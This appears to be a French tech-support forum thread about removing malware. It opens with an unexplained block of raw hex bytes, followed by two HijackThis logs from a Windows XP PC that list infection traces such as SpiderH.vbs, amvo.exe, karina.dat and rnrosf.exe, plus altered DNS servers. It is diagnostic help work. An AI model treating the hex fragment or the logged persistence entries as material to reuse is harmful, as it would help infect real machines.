'E6 59 89 EA D3 83 B2 21 14 6A 3E A9 8D 5C 9F 6B 1A C5 DA 6F E1 5E 24 DD CB AD 57 F9 9F F2 39 C6 DB 4E 37 F9 2F 54 BB FE 4A DB 2C 01 7A 17 49 D5 91 C5 A8 3A 86 27 E9 00 D1 A8 F6 5A B2 05 15 BD
'5A B5 65 0F 8E 87 2F 5A 79 5A AD 34 87 60 95 4F AA E2 F5 EF BA 44 19 8A 8B 63 7A F0 7D 59 2F 06 61 89 52 0D 7D 13 CB 8D CF 58 65 BD B3 A2 B8 1F 6C 2B 7E 9A E2 CB 15 CC E3 A1 1D D2 6E 94 7D 34
'3C BF 99 3A 60 5E AF AA E5 9C AE B2 2B C7 20 39 48 CE 33 66 1E BA 29 F5 B3 EB 60 D3 47 A8 37 9F 4F 98 34 83 63 83 97 FD 5A ED 79 DE 3F 87 EB 11 48 05 96 6D 34 67 1E D4 2C AD FA 2B CD AB FA EB
'5C 55 4D 26 52 73 5A CF 28 0D 14 DE 9D 90 15 23 75 48 94 11 72 69 EA AB 6D B4 59 B1 C0 E4 90 7F 45 E9 BA 4F FD 59 DC FE D8 5F EF 57 5E 0E 9D F1 9A 0D 4E 9E D7 33 40 F1 80 37 33 2E 5A E0 4A C1
'3F A4 2D F8 5E 6D 42 11 E9 19 C7 CA B5 EF 3C BD 1D F9 63 B4 D8 FA EB 97 1B 55 DC 67 DD 4E FA 3E B0 D7 C0 F9 5F 49 D6 EA BA 1E AB 9F 15 DB 49 38 1F 15 06 E2 0F BC 3E B0 A7 6B 9D 24 D6 4F 2C 47
'34 72 3E 75 3F 68 5E 9D AC D3 0D 36 AE 7D 2B E0 60 95 E3 1F 75 88 AC A5 40 02 DE AA E9 C7 5F A6 57 33 7D 1B 9E A2 48 36 B5 01 52 69 F9 6A 64 AD 40 CF 92 9A AA 28 8A 54 09 40 8B B5 5E 5A B5 1D
'B4 79 29 31 95 B6 81 94 DE 9B 97 B2 A6 53 48 04 E4 C6 88 AD F6 D3 2C 05 AA 31 5D D4 D0 09 CB 6A BB 80 31 AA 69 00 14 86 6E FA A9 03 41 71 4A 66 06 B3 B3 E3 B6 A8 BE FA 10 43 1A 4A 81 4B CC 29
'2D 21 BD 40 D7 A6 10 C7 02 4D 59 17 A5 AB 1B 53 05 00 4A AB D5 D0 D3 4F A8 16 71 AA A9 6A 94 DD 80 BB 50 1C 3B EA CB 81 85 25 E4 14 B7 0D 26 C2 25 7D 74 01 85 2D DF 65 A8 73 D1 B9 94 AA 38 90
'05 05 EF 85 02 BD 18 A6 AC 11 05 8C 2A C6 2C A7 BE AA 89 48 BA FA 6A 93 D6 BE 60 7D 93 52 99 75 13 9E C9 1B E7 34 9C A4 61 7A E9 EA DC 49 A9 9E EA 07 E2 36 EE F3 48 30 A9 18 61 5E 55 6D D4 E5
'30 14 62 30 F9 69 2C B9 4D 6F 78 32 D2 8C 20 E1 63 E9 A7 32 34 65 39 77 DA 88 04 23 BE 98 61 6C 01 C1 6F BE 83 97 28 F5 EF A6 3E 60 65 CA D8 E0 BD 96 AB B6 6D 82 D4 27 3A 9D 87 D7 56 AE 80 E3
'7A 35 1C 96 D1 B0 C4 EE A0 31 D8 DA F8 D6 83 62 77 F0 FC B4 2C BB 58 0A 35 01 62 33 71 DB 4C 28 48 C4 55 A8 3B 2A EC 41 C6 80 00 45 8D 12 A9 07 6D 5E 63 89 DD 56 18 0A 00 62 77 D6 A8 ED 6A CD
'9F BA 9A B2 8B 5A A5 D7 50 35 22 6F 14 CB 6E B5 66 47 23 7F AA B5 09 14 80 36 1A 86 81 10 01 D9 8D 30 44 6D B7 1A A8 D4 61 8F AB 6D 11 57 18 9C 17 B6 91 40 72 5B BB 7D 67 30 93 85 AD 5B 2C 6D
'86 C3 80 34 82 C3 03 8D 32 4C AD 01 DD 49 68 2F 85 6A 24 DC D5 12 DB 41 F4 D3 90 39 EF A6 A4 B4 3D 95 D5 39 6D 88 BD 2F 2A 77 0A AA D8 68 E5 72 8E 36 C6 83 94 77 8A E9 15 43 85 51 8D 4E 02 A9
'59 C8 8E 63 47 DD 4B C9 DD 5D 37 89 76 56 79 22 55 19 89 C2 AB 70 18 CC 7F 25 57 2F BE B5 44 9C D5 96 48 EC 12 1B 06 63 EF 17 D8 01 ED AB 11 7F 63 55 B8 0C 13 32 C1 19 91 8E 55 18 9F 45 33 A7
'68 64 D7 46 27 9E 46 85 1B 18 D1 6C 58 AE E6 39 BB 6B 17 54 43 2C 91 40 3F 96 CE 39 9F 67 7D 69 FE A7 A8 89 82 C1 A5 32 85 C2 F9 B2 0F 40 C0 D6 56 C8 F7 78 0E CA 54 23 B1 17 97 74 67 06 D5 4F
'9B B4 04 1F A0 D6 A8 7C A1 A2 7E 23 AA D4 1B E3 89 4F D0 B5 C1 93 CD 1A BD 22 67 97 A7 33 0D 99 44 E0 1F 67 2A BD 6F 97 7A 86 B7 5D A6 F8 9D 6F 4F FE 9E AD 6E 4A B4 DC D9 1C 1F 78 A8 48 F2 F7
'52 B6 47 FB 74 31 75 CB 45 2D A8 39 5D 5B CB BA 4E 99 A0 7D 5A 4B 2B 49 74 44 59 0A DB 8D 85 FC 20 6E BD 79 D9 22 0C B9 6B D7 F9 9F 53 F1 12 43 D3 E3 37 E5 1E 74 DD CD 6C AA 9E C3 7A F3 CD A7
'60 49 C0 0A D7 15 9E DF AB 52 D3 D1 33 CD 47 0A C7 D7 74 0A E7 87 9B 98 7A 70 AF 47 D5 C2 B6 BB 9A 0F 0B C4 A4 1E F1 81 AE 1F 5B 86 4D 3C B0 EB 62 5B 9D 3B A4 9E 9C A6 F5 DD 84 E9 BA 84 08 65
'51 2C 67 8A 32 09 52 2F DE 2C 6A 6B 77 BD 8F 33 DB B6 F1 A7 06 71 7A 44 07 51 E6 8D 33 46 B9 93 4D 1C B3 4A 57 70 28 62 5B FD E6 15 E8 7C C3 A5 65 4F 8D 40 4A 2A 84 9F 0B 9B 6D 56 F4 0A BD 42
'69 7A 47 48 D5 0D 0C 5C A9 A7 5E 5C 60 5F 33 BB DF 12 CC 49 E1 DB 59 BC B9 E6 48 5B 4B 16 83 AA CC B0 EB B4 E8 23 32 4C D9 12 45 5E 10 C0 B5 85 CE FC 68 77 DA DF 8F 32 5E EB C6 4A 25 14 D1 AE
'70 27 C8 5A 76 9D BA 96 A0 29 30 BC B1 2C 72 01 70 C5 43 E6 23 D1 C3 4A D6 1C BA DD 50 1B 04 F2 0C 7D 35 EB E4 EB 7D 3B 45 03 4C D3 45 2B 28 FC 38 22 60 CC C7 B2 C0 B5 87 7D 78 A3 9D F3 49 2F
'14 8E C5 E4 3F 59 8D CD 5E 1E 7E 40 9B B5 AD 77 58 DC 10 76 A6 06 16 DD 4A B7 65 12 82 6B 56 58 C0 D5 4D 56 11 9B 60 A2 E5 F6 8A 90 33 39 CA A5 AD 7E EA 76 8F 45 26 BF A5 C9 D4 34 E3 98 F0 48
'F1 CD 18 DA 50 05 37 5E F1 7A 93 2A 88 9C 9E CA E9 7E 5D CB 68 35 91 93 B3 54 E4 1E E2 A9 85 45 F2 6D 68 2C 9E C6 FA 34 72 53 4D 9F 12 70 AB 3A 74 1B CD 7A 2F 34 74 69 3A 63 0E A3 A5 1F E4 26
'36 75 FF 00 65 27 FA AD 5E 65 9A 46 24 5F D2 2A A9 97 76 AB 80 57 84 80 D1 8C 6D F2 D0 72 EF 4C C8 D6 AB 00 AE DA BD C3 66 67 84 8A 4B 2E 1E 8A DA ED 7C 29 04 6D 3B F7 53 4C 5D 4C 9E 5D 39 3A
'EE A2 FB 4E 9C DB FE 22 57 AE D5 F9 43 45 D6 F5 63 57 2E AA 58 16 4C 9F 11 1C 6A 1B 3E 50 12 EA C7 C3 80 AF 1A F1 6A 34 9A D8 BA 8E 88 0E 64 7B 41 D8 E0 E0 50 D7 A4 D2 F9 C1 A3 8C 05 E9 AC 24
'03 61 90 65 CD BB 62 DE B9 BE B5 91 E9 A3 91 E4 AD A5 5A 9D 06 79 D2 3D 3E 99 FA 5F 4C D2 27 2E 3D 2C 0F 95 3B 14 F2 D5 7F 84 D7 96 00 83 8D 74 75 53 6A 35 B3 C9 AD D5 B0 79 E5 38 91 80 03 72
'A8 EC 15 90 A6 EA EB C4 F6 D6 02 BC 35 E3 CC E7 6B E3 CD 03 7A 2B DA 79 26 4E 67 4D D1 35 F6 47 93 B7 C0 DC BF EE 57 94 D4 C5 9E 36 1B C0 AF 45 F9 7B 26 6D 1B 44 76 C3 3B A0 1D CC 43 D7 2F 73
'A5 AB 65 CC 77 5B B0 B5 D1 C9 D6 FC C6 D3 1F 87 E9 5A C0 A7 80 CB 01 6B EF 90 47 20 FE 03 5E 19 6B EA 7E 7C D2 89 FC AB CE 22 FF 00 0B 3C 32 7E D5 E1 FE FD 7C B4 6C AD BB 5B 4D 1A FC 6C FF 00
'BC 8A 7D A8 72 4A 13 0A 33 38 D8 3E 4A CC D8 F7 D0 0C CE E9 1A 21 69 1C 85 54 18 92 5B 00 05 AB 57 49 D5 9A 0D EA 33 88 E2 E9 33 6E 87 55 99 87 76 60 0D EB EA 1E 5F 05 6C 3B 0F CD 5F 26 EB B1
'BC 7D 3E 38 9A C1 A1 92 4B 8B DC 5D 58 0B 82 2B EA 9E 57 9F E2 74 F0 6A AD 6E 7C 6B 20 1F 68 03 FA 6B 83 22 8C 8D 7E 5C 89 EE 16 EA 52 DF 89 E2 7C DD A6 F8 6F 31 F5 14 0B 65 67 59 57 D1 22 23
'1F DE
1
Réponse 2 / 50
jlpjlp Messages postés 52399 Statut Contributeur sécurité 5 040
 
slt,

colle un rapport hijackthis et dis quel programme a trouvé cette infection et si tu as colle le rapport pour voir les fichiers infectés

https://leblogdeclaude.blogspot.com/2006/10/informatique-section-hijackthis.html
0
Réponse 3 / 50
waeeeeeelllll
 
voici le raport

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:50:12, on 28/08/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Fujitsu Siemens Computers\Odyssey Client for Fujitsu Siemens Computers\odClientService.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\WINDOWS\AGRSMMSG.exe
C:\Program Files\Apoint2K\Apoint.exe
C:\Program Files\Power Manager\PM.exe
C:\Program Files\Fujitsu Siemens Computers\Odyssey Client for Fujitsu Siemens Computers\OdTray.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe
C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe
C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb08.exe
C:\Program Files\Hewlett-Packard\HP Software Update\HPWuSchd.exe
C:\WINDOWS\System32\WScript.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\Google\GoogleToolbarNotifier\1.2.1128.5462\GoogleToolbarNotifier.exe
C:\Program Files\WinZip\WZQKPICK.EXE
C:\Program Files\Apoint2K\Apntex.exe
C:\Program Files\Skype\Plugin Manager\skypePM.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = https://fr.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,SearchAssistant = http://www.crawler.com/search/ie.aspx?tb_id=66005
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,CustomizeSearch = http://dnl.crawler.com/support/sa_customize.aspx?TbId=66005
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://dnl.crawler.com/support/sa_customize.aspx?TbId=66005
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - (no file)
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll
O2 - BHO: AskBarFr BHO - {5A074B21-F830-49de-A31B-26E51D6FD4D9} - C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
O2 - BHO: Windows Live Toolbar Helper - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O3 - Toolbar: Windows Live Toolbar - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O3 - Toolbar: Barre d´outils Ask - {5A074B29-F830-49de-A31B-26E51D6FD4D9} - C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe"
O4 - HKLM\..\Run: [SiSUSBRG] C:\WINDOWS\SiSUSBrg.exe
O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [AGRSMMSG] AGRSMMSG.exe
O4 - HKLM\..\Run: [Apoint] "C:\Program Files\Apoint2K\Apoint.exe"
O4 - HKLM\..\Run: [PowerManager] C:\Program Files\Power Manager\PM.exe
O4 - HKLM\..\Run: [OdTray.exe] "C:\Program Files\Fujitsu Siemens Computers\Odyssey Client for Fujitsu Siemens Computers\OdTray.exe"
O4 - HKLM\..\Run: [DeviceDiscovery] "C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb08.exe
O4 - HKLM\..\Run: [HP Software Update] "C:\Program Files\Hewlett-Packard\HP Software Update\HPWuSchd.exe"
O4 - HKLM\..\Run: [SpiderH] C:\WINDOWS\system32\SpiderH.vbs
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [amva] C:\WINDOWS\system32\amvo.exe
O4 - HKCU\..\Run: [updateMgr] "C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe" AcRdB7_1_0
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\1.2.1128.5462\GoogleToolbarNotifier.exe
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SERVICE RÉSEAU')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Startup: MSN Pictures Displayer.lnk = C:\Program Files\MSN Pictures Displayer\MSN Pictures Displayer.exe
O4 - Global Startup: Lancement rapide d'Adobe Reader.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: WinZip Quick Pick.lnk = C:\Program Files\WinZip\WZQKPICK.EXE
O8 - Extra context menu item: &Enregistrer cette page dans MonAsk - res://C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/savewebpage.html
O8 - Extra context menu item: &Enregistrer l'image dans MonAsk - res://C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/saveimages.html
O8 - Extra context menu item: &Enregistrer l'image dans un dossier - res://C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/saveimagetofolder.html
O8 - Extra context menu item: &Enregistrer la page dans un dossier… - res://C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/savepagetofolder.html
O8 - Extra context menu item: &Enregistrer le lien dans MonAsk - res://C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/savelink.html
O8 - Extra context menu item: &Enregistrer le lien dans un dossier - res://C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/saveltof.html
O8 - Extra context menu item: &Windows Live Search - res://C:\Program Files\Windows Live Toolbar\msntb.dll/search.htm
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\Office12\REFIEBAR.DLL
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {30528230-99F7-4BB4-88D8-FA1D4F56A2AB} (YInstStarter Class) - http://us.dl1.yimg.com/download.yahoo.com/dl/installs/yinst20040510.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/...
O17 - HKLM\System\CCS\Services\Tcpip\..\{FF4405A7-048A-4750-AC06-597E612A5F29}: NameServer = 193.95.122.40 193.95.93.77
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\FICHIE~1\Skype\SKYPE4~1.DLL
O20 - AppInit_DLLs: karina.dat
O23 - Service: Boonty Games - BOONTY - C:\Program Files\Fichiers communs\BOONTY Shared\Service\Boonty.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: Odyssey Client for Fujitsu Siemens Computers (odClientService) - Funk Software, Inc. - C:\Program Files\Fujitsu Siemens Computers\Odyssey Client for Fujitsu Siemens Computers\odClientService.exe
0
Réponse 4 / 50
waeeeeeelllll
 
merci pour votre reponse voici le raport

Logfile of HijackThis v1.99.1
Scan saved at 12:31:19, on 29/05/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Fujitsu Siemens Computers\Odyssey Client for Fujitsu Siemens Computers\odClientService.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Java\jre1.5.0\bin\jusched.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\WINDOWS\AGRSMMSG.exe
C:\Program Files\Apoint2K\Apoint.exe
C:\Program Files\Power Manager\PM.exe
C:\Program Files\Fujitsu Siemens Computers\Odyssey Client for Fujitsu Siemens Computers\OdTray.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe
C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe
C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb08.exe
C:\Program Files\Hewlett-Packard\HP Software Update\HPWuSchd.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\Apoint2K\Apntex.exe
C:\documents and settings\walid\local settings\application data\rnrosf.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\ManyCam 2.2\ManyCam.exe
C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
C:\Program Files\WinZip\WZQKPICK.EXE
C:\Program Files\Skype\Plugin Manager\skypePM.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\MSN Pictures Displayer\MSN Pictures Displayer.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\Messenger\msmsgs.exe
C:\PROGRA~1\WINZIP\winzip32.exe
C:\Documents and Settings\walid\Local Settings\Temp\wzf4e8\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.crawler.com/search/dispatcher.aspx?tp=aus&qkw=%s&tbid=66005
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.msn.com/fr-fr/?ocid=iehp
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = https://fr.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,SearchAssistant = http://www.crawler.com/search/ie.aspx?tb_id=66005
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,CustomizeSearch = http://dnl.crawler.com/support/sa_customize.aspx?TbId=66005
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://fr.yahoo.com/
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.crawler.com/search/ie.aspx?tb_id=66005
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://dnl.crawler.com/support/sa_customize.aspx?TbId=66005
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - (no file)
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: AskBarFr BHO - {5A074B21-F830-49de-A31B-26E51D6FD4D9} - C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll
O2 - BHO: Windows Live Toolbar Helper - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O3 - Toolbar: Windows Live Toolbar - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O3 - Toolbar: Barre d´outils Ask - {5A074B29-F830-49de-A31B-26E51D6FD4D9} - C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\jre1.5.0\bin\jusched.exe
O4 - HKLM\..\Run: [SiSUSBRG] C:\WINDOWS\SiSUSBrg.exe
O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [AGRSMMSG] AGRSMMSG.exe
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe
O4 - HKLM\..\Run: [PowerManager] C:\Program Files\Power Manager\PM.exe
O4 - HKLM\..\Run: [OdTray.exe] "C:\Program Files\Fujitsu Siemens Computers\Odyssey Client for Fujitsu Siemens Computers\OdTray.exe"
O4 - HKLM\..\Run: [DeviceDiscovery] C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb08.exe
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\Hewlett-Packard\HP Software Update\HPWuSchd.exe
O4 - HKLM\..\Run: [egui] "C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe" /hide /waitservice
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [amva] C:\WINDOWS\system32\amvo.exe
O4 - HKCU\..\Run: [updateMgr] C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe AcRdB7_1_0
O4 - HKCU\..\Run: [rnrosf] c:\documents and settings\walid\local settings\application data\rnrosf.exe rnrosf
O4 - HKCU\..\Run: [Instant Access] C:\WINDOWS\system32\nsinet.exe /res
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [ManyCam] "C:\Program Files\ManyCam 2.2\ManyCam.exe"
O4 - Startup: MSN Pictures Displayer.lnk = C:\Program Files\MSN Pictures Displayer\MSN Pictures Displayer.exe
O4 - Global Startup: Lancement rapide d'Adobe Reader.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: WinZip Quick Pick.lnk = C:\Program Files\WinZip\WZQKPICK.EXE
O8 - Extra context menu item: &Enregistrer cette page dans MonAsk - res://C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/savewebpage.html
O8 - Extra context menu item: &Enregistrer l'image dans MonAsk - res://C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/saveimages.html
O8 - Extra context menu item: &Enregistrer l'image dans un dossier - res://C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/saveimagetofolder.html
O8 - Extra context menu item: &Enregistrer la page dans un dossier… - res://C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/savepagetofolder.html
O8 - Extra context menu item: &Enregistrer le lien dans MonAsk - res://C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/savelink.html
O8 - Extra context menu item: &Enregistrer le lien dans un dossier - res://C:\Program Files\AskBarFr\bar\bin\askBar_fr.dll/saveltof.html
O8 - Extra context menu item: &Windows Live Search - res://C:\Program Files\Windows Live Toolbar\msntb.dll/search.htm
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0\bin\npjpi150.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0\bin\npjpi150.dll
